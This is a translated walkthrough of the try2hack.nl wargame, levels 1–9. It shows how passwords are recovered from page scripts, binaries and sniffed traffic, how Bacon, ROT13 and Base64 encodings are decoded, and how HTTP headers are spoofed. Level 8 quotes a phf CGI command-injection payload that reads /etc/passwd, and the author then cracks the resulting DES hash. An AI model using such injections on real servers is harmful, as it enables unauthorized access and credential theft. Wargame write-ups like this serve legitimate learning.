Network shortcuts


A few days ago (13.06.02) someone sent me the URL http://www.try2hack.nl/level1.html over ICQ, saying: go on, test your strength. I admit that every task on this site was difficult in its own way but, at the same time, interesting. To everyone who has not yet taken this test, I strongly recommend trying it. And those who have already tried and did not reach the 10th task, read this article =)
Well, let's begin. I will describe the current solutions to the first 9 tasks, going into detail only on the ones that are complex and interesting.

#1.

Elementary. Here is the JS source of the password check:
 <SCRIPT LANGUAGE="JavaScript">
 function Try(passwd) {
   if (passwd == "hackerzzz") {  // the comparison runs in the browser, so the password is in the page source
     alert("Alright! On to level 2 ...");
     location.href = "levvel2.html";
   }
   else {
     alert("The password is not correct. Please Do not Try Again.");
     location.href = "http://www.disney.com";
   }
 }
 </SCRIPT>
In the third line, the entered value is checked against the word "hackerzzz", which in this case plays the role of a password.

#2.

I confess that at first glance the task seemed difficult to me. I was wrong =)
Download the Flash file, open it in Notepad (a hex editor also works), and at the very bottom (addresses 00000440-00000490) we see:
txtUsername ...... Try2Hack.I .... txtPassword ...... NokiaIsGood.I .......... LLeVeLL3.html
Login: Try2Hack
Password: NokiaIsGood
Next task: LLeVeLL3.html

#3.

A very witty and interesting task.
Here is the JS source:
 <SCRIPT language="JavaScript">
 pwd = prompt("Please enter the password for level 3:", "");
 if (pwd == PASSWORD) {
   alert("Alright!\nEntering Level 4 ...");
   location.href = CORRECTSITE;
 } else {
   alert("WRONG!\nBack to disneyland !!!");
   location.href = WRONGSITE;
 }
 // These assignments run only after the check above has already been made.
 PASSWORD = "AbCdE";
 CORRECTSITE = "level4.html";
 WRONGSITE = "http://www.disney.com";
 </SCRIPT>
It would seem that the password is "AbCdE", but how can that work if it is defined at the end? Yet at the time of the check the variable PASSWORD was, for some reason, already defined; otherwise the interpreter would have raised the error "PASSWORD: the definition is missing." Only after 20 minutes of meditation did a line catch my eye:
<SCRIPT src="JavaScript"></SCRIPT>
I never would have thought that "JavaScript" was a file =))) It contained exactly the true values of the variables:
PASSWORD = "TheCorrectAnswer";
CORRECTSITE = "thelevel4.html";
WRONGSITE = "http://www.disney.com";

#4.

While digging through the applet, my attention was drawn to the strings at addresses 00000A60-00000A80. The applet read lines from the file *level4* (the disassembled source later confirmed this). Most likely, it was a password file. Most interestingly, the applet kept working with it from my hard drive. That is, the file *level4* was either on the internet or on my computer. And if on mine, where? Right: either in the cookies or in the Temp folders. After cleaning out both, we went to the page with the applet again. A couple of files appeared in Temp, one of which was level4[2].txt.
Content:
5_level_5.html
Try2Hack
AppletsAreEasy
By the way, inside the applet, as a decoy, there was this: "txtUsername = AlmostAHacker ..... txtPassword = ZqrE01A2d". Cunning =)
/* Gr33tz 2 godson */

#5.

We are asked to download the file level5.exe. In it you need to enter a login and password, which are obviously stored in the file itself. Opening it in a hex editor, this caught my eye:
http://www.try2hack.f2s.com/login-level6.html ..... txtUsername = AlmostAHacker ..... txtPassword = ZqrE01A2d
Addresses: 000019F0-00001A50.
Too easy, I thought. Besides, the passwords did not fit. Then a disassembler came to the rescue =):
Login: Try2Hack
Password: OutOfInspiration
Next task: level-6.html
/* Gr33tz 2 a3oX =) */

#6.

A very confusing task. Once again we are asked to download a program, which connects to the server right before your eyes and checks the data you entered for validity. This time the creators honestly warn: "this is not level 5, you can not decompile this exe's".
The SpyNet sniffer came to the rescue. I will not describe how this was done (that needs a separate article); I will only show the packet that interests us:
 0000: 44 45 53 54 00 00 20 53 52 43 00 00 08 00 45 00  DEST.. SRC....E.
 0010: 02 40 5F 78 40 00 71 06 14 E0 D5 13 8C 02 C2 57  .@_x@.q........W
 0020: 6F F 00 00 04 AE EC 04 FD 8C 1A 9A 11 B0 50 10  o..P..........P.
 0030: 40 7C AE D3 00 00 48 54 54 50 2F 31 2E 31 20 32  @|....HTTP/1.1 2
 0040: 30 30 20 4F 4B 0D 0A 44 61 74 65 3A 20 53 75 6E  00 OK..Date: Sun
 0050: 2C 20 31 34 20 41 70 72 20 32 30 30 32 20 31 38  , 14 Apr 2002 18
 0060: 3A 32 32 3A 35 35 20 47 4D 54 0D 0A 53 65 72 76  :22:55 GMT..Serv
 0070: 65 72 3A 20 41 70 61 63 68 65 0D 0A 43 61 63 68  er: Apache..Cach
 0080: 65 2D 43 6F 6E 74 72 6F 6C 3A 20 6D 61 78 2D 61  e-Control: max-a
 0090: 67 65 3D 36 30 34 38 30 30 0D 0A 45 78 70 69 72  ge=604800..Expir
 00A0: 65 73 3A 20 53 75 6E 2C 20 32 31 20 41 70 72 20  es: Sun, 21 Apr 
 00B0: 32 30 30 32 20 31 38 3A 32 32 3A 35 35 20 47 4D  2002 18:22:55 GM
 00C0: 54 0D 0A 4C 61 73 74 2D 4D 6F 64 69 66 69 65 64  T..Last-Modified
 00D0: 3A 20 57 65 64 2C 20 31 38 20 41 70 72 20 32 30  : Wed, 18 Apr 20
 00E0: 30 31 20 31 35 3A 32 38 3A 30 30 20 47 4D 54 0D  01 15:28:00 GMT.
 00F0: 0A 45 54 61 67 3A 20 22 30 2D 63 63 2D 33 61 64  .ETag: "0-cc-3ad
 0100: 64 62 32 38 30 22 0D 0A 41 63 63 65 70 74 2D 52  db280"..Accept-R
 0110: 61 6E 67 65 73 3A 20 62 79 74 65 73 0D 0A 43 6F  anges: bytes..Co
 0120: 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 30  ntent-Length: 20
 0130: 34 0D 0A 4B 65 65 70 2D 41 6C 69 76 65 3A 20 74  4..Keep-Alive: t
 0140: 69 6D 65 6F 75 74 3D 31 35 2C 20 6D 61 78 3D 31  imeout=15, max=1
 0150: 30 30 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20  00..Connection: 
 0160: 4B 65 65 70 2D 41 6C 69 76 65 0D 0A 43 6F 6E 74  Keep-Alive..Cont
 0170: 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 70  ent-Type: text/p
 0180: 6C 61 69 6E 0D 0A 0D 0A 00 28 45 4E 43 52 59 50  lain.....(ENCRYP
 0190: 54 49 4F 4E 20 54 59 50 45 29 0D 0A 42 2A 43 2A  TION TYPE)..B*C*
 01A0: 4E 2A 2A 4E 0D 0A 0D 0A 28 55 53 45 52 4E 41 4D  N**N....(USERNAM
 01B0: 45 29 0D 0A 61 62 61 62 61 20 61 62 62 61 62 20  E)..ababa abbab 
 01C0: 62 61 61 61 61 20 61 61 61 62 62 0D 0A 0D 0A 28  baaaa aaabb....(
 01D0: 50 41 53 53 57 4F 52 44 29 0D 0A 61 62 61 62 61  PASSWORD)..ababa
 01E0: 20 61 61 61 61 61 20 61 62 62 61 61 20 61 62 62   aaaaa abbaa abb
 01F0: 62 61 20 61 61 61 61 61 20 62 61 61 61 61 20 62  ba aaaaa baaaa b
 0200: 61 61 62 61 20 62 61 62 62 61 0D 0A 0D 0A 28 50  aaba babba....(P
 0210: 41 47 45 29 0D 0A 61 62 61 62 61 20 61 61 62 61  AGE)..ababa aaba
 0220: 61 20 62 61 61 62 62 20 61 61 62 61 61 20 61 62  a baabb aabaa ab
 0230: 61 62 61 20 62 61 61 61 62 20 61 61 62 61 61 20  aba baaab aabaa 
 0240: 62 61 61 62 62 20 61 61 62 61 61 20 61 62        baabb aabaa ab
It is slightly cropped (just try copying properly out of SpyNet), but the main part (password, login, page) is clearly visible. It would seem that the task is done, but no. All the data was encrypted :-/
(USERNAME) .. ababa abbab baaaa aaabb ....
(PASSWORD) .. ababa aaaaa abbaa abbba aaaaa baaaa baaba babba ....
I took John the Ripper and started brute-forcing ... just kidding =)) This was Bacon's algorithm. A purely algorithmic scheme, not even encryption but encoding:
aaaaa = a
aaaab = b
aaaba = c
aaabb = d
etc.
The result of manual decoding was:
Login: LORD
Password: LANPARTY
Page: LEVELSEVEN.html
Study computer science, kids =)
/* Gr33tz 2 D4rkGr3y ;) */
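
The manual decoding of level 6 can be reproduced with a short decoder. This is an added example, not code from the original article; it assumes the 24-letter Bacon alphabet (I/J and U/V share one code), which agrees with the four mappings listed above, and the names `bacon_decode`, `fold` and `CAPTURED` are illustrative.

```python
# Added example: decode the Baconian groups from the captured level 6 response.
# Assumption: 24-letter Bacon alphabet, where I/J and U/V share one code.
import re

BACON_ALPHABET = "ABCDEFGHIKLMNOPQRSTUWXYZ"  # index n <-> 5-symbol code (a=0, b=1)

# Field values copied from the packet on this page; PAGE is cut off mid-group.
CAPTURED = {
    "USERNAME": "ababa abbab baaaa aaabb",
    "PASSWORD": "ababa aaaaa abbaa abbba aaaaa baaaa baaba babba",
    "PAGE": "ababa aabaa baabb aabaa ababa baaab aabaa baabb aabaa ab",
}

def bacon_decode(text):
    """Return (plaintext, leftover); leftover is a trailing incomplete group."""
    symbols = re.sub(r"[^ab]", "", text.lower())
    usable = len(symbols) - len(symbols) % 5
    letters = []
    for i in range(0, usable, 5):
        group = symbols[i:i + 5]
        value = int(group.replace("a", "0").replace("b", "1"), 2)
        if value >= len(BACON_ALPHABET):
            raise ValueError(f"{group!r} is not a valid 24-letter Bacon code")
        letters.append(BACON_ALPHABET[value])
    return "".join(letters), symbols[usable:]

def fold(word):
    """Fold J->I and V->U so a guessed word can be compared with decoder output."""
    return word.upper().replace("J", "I").replace("V", "U")

if __name__ == "__main__":
    for field, encoded in CAPTURED.items():
        plain, leftover = bacon_decode(encoded)
        note = f" (incomplete group {leftover!r} dropped)" if leftover else ""
        print(f"{field}: {plain}{note}")
```

The decoder prints U where the page name has V, because the two letters share the code baabb; `fold` makes that ambiguity explicit when checking a candidate word.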

#7.

We are given a capricious Perl script, level7.pl. The task: make it believe that:
1) the page from which we came to the site is http://www.microsoft.com/ms.htm
2) we use the Microsoft Internet Explorer 6.72 browser
3) we run a UNIX/LINUX operating system
In general the task is easy: we just need to generate an HTTP request whose headers contain this information. I.e.:
Referer: http://www.microsoft.com/ms.htm
User-agent: MSIE 6.72
But there is a small problem with the OS. There is no header field in which the operating system version is stated explicitly. It is usually extracted from the User-Agent. Hoping that level7.pl does exactly that, we sketched a Perl script that sent this request:
GET /cgi-bin/level7.pl HTTP/1.0
Referer: http://www.microsoft.com/ms.htm
User-Agent: MSIE 6.72 (UNIX/LINUX)
Accept: */*

And there we go =)
<A HREF="../Level-8.html"> Level 8 </A>
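
Why this works, seen from the server side, as an added example that is not part of the original article: `parse_request` and `level7_check` are hypothetical stand-ins for level7.pl (its real logic is not shown on the page), and the second request is a constructed sample. Every value the check inspects is a header the client chooses, so it cannot serve as an access control.

```python
# Added example: a hypothetical server-side check in the style of level 7.
# level7.pl itself is not shown on the page; this logic is an assumption.
import re
from email.parser import Parser

SPOOFED_REQUEST = (  # the request from the article
    "GET /cgi-bin/level7.pl HTTP/1.0\r\n"
    "Referer: http://www.microsoft.com/ms.htm\r\n"
    "User-Agent: MSIE 6.72 (UNIX/LINUX)\r\n"
    "Accept: */*\r\n\r\n"
)
ORDINARY_REQUEST = (  # constructed sample of an unmodified browser request
    "GET /cgi-bin/level7.pl HTTP/1.0\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\r\n"
)

def parse_request(raw):
    """Split a raw HTTP/1.0 request into method, path and a header mapping."""
    request_line, _, header_block = raw.partition("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = Parser().parsestr(header_block, headersonly=True)
    return method, path, headers

def level7_check(headers):
    """Evaluate the three conditions; each one reads a client-supplied header."""
    agent = headers.get("User-Agent", "")
    browser = re.search(r"MSIE (\d+\.\d+)", agent)
    return {
        "referer": headers.get("Referer") == "http://www.microsoft.com/ms.htm",
        "browser": bool(browser) and browser.group(1) == "6.72",
        # No header carries the OS, so it can only be guessed from User-Agent.
        "os": bool(re.search(r"UNIX|LINUX", agent, re.IGNORECASE)),
    }

if __name__ == "__main__":
    for name, raw in (("spoofed", SPOOFED_REQUEST), ("ordinary", ORDINARY_REQUEST)):
        _, _, headers = parse_request(raw)
        print(name, level7_check(headers))
```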

#8.

The name of the handler script, phf.cgi, immediately caught my attention. I remember it had a lot of break-ins on its conscience. Rummaging through the bug trackers, I found an exploit:
/cgi-bin/phf.pp?Qalias=x%0a/bin/cat%20/etc/passwd
The answer was:
BuiZe: Bu3kOx4cCMX2U
The password is encrypted with ordinary DES. It took JTR 15 minutes to recover the password. Exactly what it is I will not give away; whoever needs it can decrypt it =)

#9.

The task page displays the message:
New message for BuiZe:

Level 8 completed!
Go to irc.<*>.org and join #<*>
There type /msg <*> begin

In other words, the battlefield moves to IRC. We have hidden the names of the server, channel and bot for reasons that are (I hope) understandable to everyone.

#9.

It consists of many mini-tasks.
We join them on the channel #Try2Hack.
We write "/msg Try2Hack perfect-start"
Well, and what does it give us? Here is what:
-TRY2HACK- Welcome to try2hack level 9! Decode the following lines to continue:
-TRY2HACK- Wbva #gel2unpx.yriry9. Gb trg gur xrl lbh arrq gb qrpbqr gur sbyybjvat yvar:
-TRY2HACK- GTI2MJj5YJ15DxVmERy1rQIZ=
-TRY2HACK- Tbbq yhpx, naq frr lbh ba #gel2unpx.yriry9.
Decode it yourself ... too hard? Well then, we won't torment you:
http://www.degraeve.com/cgi-bin/rot13.cgi
So we deciphered it, and this is what we got:
Join #try2hack.level9. To get the key you need to decode the following line:
TGV2ZWw5LW15QkIzREl1eDVM=
Good luck, and see you on #try2hack.level9.
We panic; we have no idea what this is:
TGV2ZWw5LW15QkIzREl1eDVM=
Hmm, at first glance it seemed to me that everything was complicated, but then we remembered mIRC scripting and typed /echo $decode(TGV2ZWw5LW15QkIzREl1eDVM=,m) and got Level9-myBB3DIux5L. Having figured that out, we go to the channel:
-LEVEL9-XXX- Welcome, I am try2hack Level9! Decode the following lines to proceed:
-LEVEL9-XXX- 010011100110100101100011011001010010000001101010011011 ...
Good old binary ... if you do not want to decode it by hand, well:
http://www.nickciske.com/binary/index.php
We get "Nice job. Now type '/msg TRY2HACK showbug' to see the bug"
Well, /msg TRY2HACK showbug, and it shows us the bug:
-TRY2HACK- ovaq pgpe - CVAT pgpe:cvatercyl
-TRY2HACK- cebp pgpe:cvatercyl {avpx hubfg unaq qrfg xrl net} {
-TRY2HACK- frg qhe [rkce [havkgvzr] - $net]
-TRY2HACK- chgfrei "ABGVPR $avpx :Lbhe cvat ercyl gbbx $qhe frpbaqf"}
Oh no, it's encoded again. Well, we use the link above once more (in case anyone forgot %)) ... we decrypted it ... And here is the bug ... and this is where we got stuck; if anyone solves it, send an email to [email protected].
For the solution of the 9th task, thanks to NeoN =)
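
The three encodings met in this level (ROT13, Base64, 8-bit binary) can be peeled off locally instead of through online converters. This is an added example, not code from the original article; the function names are illustrative and the inputs are the lines quoted above, including the stray space before "=" and the truncated bit string.

```python
# Added example: local decoders for the encodings used by the level 9 bot.
# Inputs in the demo are the lines quoted in the article.
import base64
import codecs

def rot13(text):
    """ROT13 rotates only A-Z/a-z; digits, '#', '$' and brackets pass through."""
    return codecs.decode(text, "rot13")

def b64_text(token):
    """Decode Base64 after dropping stray spaces and repairing the padding."""
    core = "".join(token.split()).rstrip("=")
    core += "=" * (-len(core) % 4)
    return base64.b64decode(core, validate=True).decode("ascii")

def bits_to_text(bits):
    """Decode 8-bit ASCII groups; return (text, leftover_bits) for cut-off input."""
    clean = "".join(ch for ch in bits if ch in "01")
    usable = len(clean) - len(clean) % 8
    text = "".join(chr(int(clean[i:i + 8], 2)) for i in range(0, usable, 8))
    return text, clean[usable:]

def key_from_bot_line(line):
    """The key line is Base64 with ROT13 applied on top, so undo ROT13 first."""
    return b64_text(rot13(line))

if __name__ == "__main__":
    print(rot13("Wbva #gel2unpx.yriry9."))
    print(key_from_bot_line("GTI2MJj5YJ15DxVmERy1rQIZ ="))
    print(bits_to_text("010011100110100101100011011001010010000001101010011011 ..."))
    print(rot13("frg qhe [rkce [havkgvzr] - $net]"))
```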

Author: D4rkGr3y


The material is published with the permission of DHGROUP (http://www.dhgroup.org)